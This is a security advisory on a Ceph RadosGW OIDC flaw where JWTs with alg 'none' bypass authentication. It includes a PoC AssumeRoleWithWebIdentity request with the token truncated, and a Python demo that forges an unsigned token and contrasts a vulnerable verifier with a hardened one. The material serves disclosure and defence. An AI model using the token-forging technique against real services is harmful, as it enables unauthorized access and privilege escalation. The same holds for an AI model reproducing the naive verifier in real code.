First published: Mon Dec 02 2024
This vulnerability affects the Ceph RadosGW OIDC provider: an attacker can bypass authentication by presenting a JWT whose header declares "none" as the algorithm (alg). Because no signature is enforced for such tokens, the claims they carry are accepted without verification, which creates a serious risk of unauthorized access and privilege escalation. The reporter believes the flaw lies in the RadosGW OIDC provider.

PoC

The HTTP request used in the PoC is reproduced below; the JWT passed as WebIdentityToken is omitted (only its leading characters are shown):

```http
POST / HTTP/2
Host: storage.xxx.se
User-Agent: aws-sdk-go-v2/1.18.0 os/macos lang/go/1.21.1 X:nocoverageredesign md/GOOS/darwin md/GOARCH/arm64 api/sts/1.19.0
Content-Type: application/x-www-form-urlencoded
Amz-Sdk-Invocation-Id: 30a74697-7d7e-4c02-b041-97d68156ee78
Amz-Sdk-Request: attempt=1; max=3
Content-Length: 1508
Accept-Encoding: gzip, deflate, br

Action=AssumeRoleWithWebIdentity&DurationSeconds=3600&RoleArn=arn%3Aaws%3Aiam%3A%3Aorg_pentest002%3Arole%2Fu-pentest002STS&RoleSessionName=test&Version=2011-06-15&WebIdentityToken=ey..
```
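To make the bypass concrete, here is an added example that is not Ceph or RadosGW code: a minimal JWT builder and two verifiers written against the standard library only. `verify_naive` reproduces the vulnerable pattern (the verifier trusts the `alg` in the attacker-controlled header, so `alg: none` means "no signature to check"), and `verify_hardened` shows the fix the advisory calls for (the verifier pins its own algorithm allow-list and always requires a signature). For simplicity the demo uses a shared HS256 key rather than the RSA keys a real OIDC provider publishes; the key, claims and tokens are all constructed for illustration.

```python
"""Added example: JWT "alg: none" bypass beside a hardened verifier.

Not Ceph/RGW code. Uses only the standard library so it runs offline.
The demo key and all tokens below are constructed for illustration.
"""
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo secret standing in for the token issuer's signing key.
DEMO_KEY = b"demo-hs256-key-not-a-real-secret"

# The verifier, not the token, decides which algorithms are acceptable.
ALLOWED_ALGS = {"HS256"}


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_jwt(claims: dict, alg: str, key: bytes = DEMO_KEY) -> str:
    """Build a compact JWT. alg='none' yields an unsigned token with an empty signature."""
    header = b64url_encode(json.dumps({"alg": alg, "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode()
    if alg == "none":
        return f"{header}.{payload}."          # what the PoC token looks like
    if alg == "HS256":
        sig = hmac.new(key, signing_input, hashlib.sha256).digest()
        return f"{header}.{payload}.{b64url_encode(sig)}"
    raise ValueError(f"unsupported alg {alg}")


def verify_naive(token: str, key: bytes = DEMO_KEY) -> Optional[dict]:
    """Vulnerable pattern: the algorithm named in the untrusted header is obeyed."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    signing_input = f"{header_b64}.{payload_b64}".encode()
    if header.get("alg") == "none":
        # No signature "required", so none is checked: forged claims are accepted.
        return json.loads(b64url_decode(payload_b64))
    if header.get("alg") == "HS256":
        expected = hmac.new(key, signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return json.loads(b64url_decode(payload_b64))
    return None


def verify_hardened(token: str, key: bytes = DEMO_KEY) -> Optional[dict]:
    """Hardened: algorithm allow-list fixed by the verifier; signature always required."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:        # empty signature is rejected outright
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(header, dict) or header.get("alg") not in ALLOWED_ALGS:
        return None                            # "none", "None", "nOnE", RS256-vs-HS256 confusion all fail here
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    forged = make_jwt({"sub": "attacker", "aud": "rgw"}, "none")
    print("naive accepts forged token:", verify_naive(forged) is not None)
    print("hardened accepts forged token:", verify_hardened(forged) is not None)
```

Running the block prints `True` for the naive verifier and `False` for the hardened one on the same unsigned token. The important design point is in `verify_hardened`: the acceptable algorithm set and the key are configuration owned by the verifier, and the header's `alg` is only ever compared against that set, never used to select behaviour on its own.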
Affected Software | Affected Version | How to fix |
---|---|---|
Ceph RadosGW OIDC provider | | Update to the patched version that enforces JWT signature validation |
The severity of REDHAT-BUG-2329846 is rated high because of the potential for unauthorized access and privilege escalation.
To fix REDHAT-BUG-2329846, update the RadosGW OIDC provider to the patched version that enforces signature validation for JWTs and rejects tokens whose algorithm is "none".
REDHAT-BUG-2329846 affects the Ceph RadosGW OIDC provider specifically.
REDHAT-BUG-2329846 allows attackers to bypass authentication using unsigned JWTs that declare "none" as the algorithm.
REDHAT-BUG-2329846 poses a risk of privilege escalation, since an unauthorized user who forges such a token can obtain the access associated with the claims in it.